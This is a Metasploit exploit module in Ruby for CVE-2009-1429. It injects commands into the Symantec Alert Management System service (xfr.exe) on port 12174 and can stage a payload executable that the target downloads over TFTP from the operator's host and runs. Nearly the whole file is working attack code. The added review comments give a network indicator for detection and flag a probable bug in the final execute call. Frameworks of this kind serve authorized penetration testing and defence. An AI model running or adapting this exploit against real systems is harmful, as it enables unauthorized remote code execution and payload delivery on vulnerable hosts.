GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/antivirus/ams_xfr.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2009-1429: command injection in the Symantec System
# Center Alert Management System service (xfr.exe), reached over plain TCP on
# port 12174 (the RPORT default below). The module either runs one
# operator-supplied command (CMD) or stages a payload EXE onto the host via
# the CmdStager 'tftp' flavor and then executes it.
#
# From the framing built in execute_command, the on-the-wire indicator is an
# inbound session to 12174 whose first bytes are four NULs, a length, a NUL
# and a command string followed by " \x00"; nothing is sent before the
# command, so there is no authentication exchange to look for.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # CmdStager: execute_cmdstager (presumably calls back into execute_command
  # below for each staged command -- confirm against the mixin);
  # Remote::Tcp: connect / sock / disconnect; EXE: generate_payload_exe.
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Module metadata and datastore options.
  #
  # @param info [Hash] base module info, merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
        'Description' => %q{
          Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
          because the application fails to properly sanitize user-supplied input.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-1429' ],
          [ 'BID', '34671' ],
          [ 'OSVDB', '54157' ],
          [ 'ZDI', '09-060' ],
          [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
        ],
        # Only one target is defined; exploit's case/else branch is therefore
        # defensive rather than reachable through normal selection.
        'Targets' => [
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        # The target pulls the payload over TFTP from SRVHOST (see windows_stager).
        'CmdStagerFlavor' => 'tftp',
        'Privileged' => true,
        'Platform' => 'win',
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-04-28',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Port xfr.exe listens on.
        Opt::RPORT(12174),
        # Optional: send this single command and skip the payload stager entirely.
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
      ]
    )
  end

  # Stage and run the payload EXE on a Windows target.
  #
  # The CmdStager uploads the payload first (tftp flavor, so the target
  # fetches it from tftphost); @payload_exe is only assigned after
  # execute_cmdstager returns, so the order of these calls matters.
  #
  # NOTE(review): generate_payload_exe presumably returns the EXE *contents*
  # (per the EXE mixin), not a path on the target, so the final
  # execute_command call frames the raw binary as a command; with
  # execute_command's single-byte length that would raise RangeError for any
  # real payload. Confirm whether the tftp stager already launches the
  # payload and this trailing call is effectively dead. @payload_exe is not
  # read anywhere else in this file.
  def windows_stager
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    # When the TFTP server is bound to all interfaces, advertise the address
    # the target can actually reach (the source address of our outbound socket).
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    # temp: '.' -- staged file goes in the service's current directory.
    execute_cmdstager({ temp: '.', tftphost: tftphost })
    @payload_exe = generate_payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  # Send one command to xfr.exe over a fresh TCP connection.
  #
  # Wire framing, built in this exact order: four zero bytes, a length byte
  # covering cmd plus the trailing " " and "\x00", a zero byte (possibly the
  # high byte of a 16-bit little-endian length -- the protocol is not
  # documented here), the command followed by a space, and a terminating NUL.
  # "Success" is judged only by whether the service answers with any bytes;
  # the reply is never parsed.
  #
  # @param cmd [String] command line to run on the target
  # @param opts [Hash] unused here; the (cmd, opts) shape is presumably what
  #   the CmdStager mixin calls back with -- confirm against the mixin
  def execute_command(cmd, opts = {})
    connect

    # +2 accounts for the " " and "\x00" appended after cmd below. This counts
    # characters (String#length), not bytes, and Integer#chr raises RangeError
    # once len exceeds 255.
    len = 2 + cmd.length

    data = [0x00000000].pack('V')
    data << len.chr
    data << "\x00"
    data << cmd + " "
    data << "\x00"

    sock.put(data)

    # get_once returns nil when nothing comes back; that is the only signal
    # checked below.
    res = sock.get_once

    # NOTE(review): message wording -- should read "Did not receive data".
    if (!res)
      print_error("Did not received data. Failed?")
    else
      print_good("Got data, execution successful!")
    end

    disconnect
  end

  # Entry point. With CMD set, run just that command and return without
  # starting a handler (no payload is involved). Otherwise stage and execute
  # the payload for the selected target platform, then start the handler.
  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'win'
      windows_stager
    else
      # Unreachable with the single 'win' target defined above; kept as a guard.
      fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler
  end
end